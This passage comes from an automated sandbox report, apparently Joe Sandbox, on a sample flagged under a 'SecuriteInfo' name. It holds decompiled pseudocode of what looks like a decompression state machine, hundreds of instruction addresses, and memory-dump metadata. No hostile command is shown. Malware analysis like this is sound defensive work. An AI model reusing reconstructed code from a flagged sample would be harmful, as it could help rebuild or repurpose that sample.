												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x00000000
                                                                                    0x00407122
                                                                                    0x00407122
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00407056
                                                                                    0x00407059
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x0040708f
                                                                                    0x00407092
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x0040706e
                                                                                    0x00407071
                                                                                    0x00407074
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x00407087
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
                                                                                    0x00406fde
                                                                                    0x00406fe1
                                                                                    0x00406fe1
                                                                                    0x00406fe4
                                                                                    0x00406fe8
                                                                                    0x00406fea
                                                                                    0x00406fc2
                                                                                    0x00406fc2
                                                                                    0x00406fca
                                                                                    0x00406fcf
                                                                                    0x00406fd1
                                                                                    0x00406fd3
                                                                                    0x00406fd3
                                                                                    0x00406fed
                                                                                    0x00406ff4
                                                                                    0x00406ff7
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00406ff9
                                                                                    0x00000000
                                                                                    0x00407286
                                                                                    0x00407286
                                                                                    0x0040728a
                                                                                    0x004075b1
                                                                                    0x00000000
                                                                                    0x004075b1
                                                                                    0x00407290
                                                                                    0x00407293
                                                                                    0x00407296
                                                                                    0x0040729a
                                                                                    0x0040729d
                                                                                    0x004072a3
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a5
                                                                                    0x004072a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407395
                                                                                    0x00407399
                                                                                    0x004073bb
                                                                                    0x004073be
                                                                                    0x004073c8
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x0040739b
                                                                                    0x0040739e
                                                                                    0x004073a2
                                                                                    0x004073a5
                                                                                    0x004073a5
                                                                                    0x004073a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407452
                                                                                    0x00407456
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x00407474
                                                                                    0x0040747b
                                                                                    0x00407482
                                                                                    0x00407489
                                                                                    0x00407489
                                                                                    0x00000000
                                                                                    0x00407489
                                                                                    0x00407458
                                                                                    0x0040745b
                                                                                    0x0040745e
                                                                                    0x00407461
                                                                                    0x00407468
                                                                                    0x004073ac
                                                                                    0x004073ac
                                                                                    0x004073af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407543
                                                                                    0x00407546
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040717d
                                                                                    0x0040717f
                                                                                    0x00407186
                                                                                    0x00407187
                                                                                    0x00407189
                                                                                    0x0040718c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407194
                                                                                    0x00407197
                                                                                    0x0040719a
                                                                                    0x0040719c
                                                                                    0x0040719e
                                                                                    0x0040719e
                                                                                    0x0040719f
                                                                                    0x004071a2
                                                                                    0x004071a9
                                                                                    0x004071ac
                                                                                    0x004071ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407490
                                                                                    0x00407490
                                                                                    0x00407493
                                                                                    0x0040749a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040749f
                                                                                    0x0040749f
                                                                                    0x004074a3
                                                                                    0x004075db
                                                                                    0x00000000
                                                                                    0x004075db
                                                                                    0x004074a9
                                                                                    0x004074ac
                                                                                    0x004074af
                                                                                    0x004074b3
                                                                                    0x004074b6
                                                                                    0x004074bc
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074be
                                                                                    0x004074c1
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c4
                                                                                    0x004074c7
                                                                                    0x004074c7
                                                                                    0x004074cb
                                                                                    0x0040752b
                                                                                    0x0040752e
                                                                                    0x00407533
                                                                                    0x00407534
                                                                                    0x00407536
                                                                                    0x00407538
                                                                                    0x0040753b
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00000000
                                                                                    0x0040744d
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074eb
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x0040751d
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x004071c2
                                                                                    0x004071c5
                                                                                    0x004071fb
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732b
                                                                                    0x0040732e
                                                                                    0x0040732e
                                                                                    0x00407331
                                                                                    0x00407333
                                                                                    0x004075bd
                                                                                    0x00000000
                                                                                    0x004075bd
                                                                                    0x00407339
                                                                                    0x0040733c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407342
                                                                                    0x00407346
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00407349
                                                                                    0x00000000
                                                                                    0x00407349
                                                                                    0x004071c7
                                                                                    0x004071c9
                                                                                    0x004071cb
                                                                                    0x004071cd
                                                                                    0x004071d0
                                                                                    0x004071d1
                                                                                    0x004071d3
                                                                                    0x004071d5
                                                                                    0x004071d8
                                                                                    0x004071db
                                                                                    0x004071f1
                                                                                    0x004071f6
                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004073ce
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00407120

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                    • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                                                    • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                                                    • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00407068 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E00407068() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
